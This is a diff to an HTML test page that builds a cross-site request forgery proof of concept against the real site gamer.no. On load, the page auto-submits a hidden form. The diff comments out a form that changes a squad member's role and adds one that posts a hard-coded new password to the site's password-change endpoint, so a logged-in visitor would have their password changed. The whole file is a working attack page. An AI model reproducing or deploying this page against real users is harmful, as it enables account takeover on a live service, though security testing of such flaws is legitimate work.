--- a/views/test.html
+++ b/views/test.html
@@ -1,8 +1,13 @@
 <body onload="setTimeout(function() { document.myform.submit() }, 50)">
-   <form name="myform" id="myform" action="https://www.gamer.no/modules?module=TekTournamentTeams&service=setSquadMemberRole" method="POST">
-        <input name="squadId" value="81920" />
+<!--- <form name="ss" id="ss" action="https://www.gamer.no/modules?module=TekTournamentTeams&service=setSquadMemberRole" method="POST">
+       <input name="squadId" value="81920" />
 	 <input name="teamId" value="81919" />
- 	 <input name="userId" value="64673" />
-        <input type="submit" value="Submit" />
+	 <input name="userId" value="64673" />
+      <input type="submit" value="Submit" />
+</form> -->
+<form name="myform" id="myform" action="https://www.gamer.no/minside/endre-passord" method="POST">
+      <input name="password" value="MXdpMGgaTkgP9BC" />
+<input name="password-repeat" value="MXdpMGgaTkgP9BC" />
+      <input type="submit" value="Submit" />
 </form>
 </body>
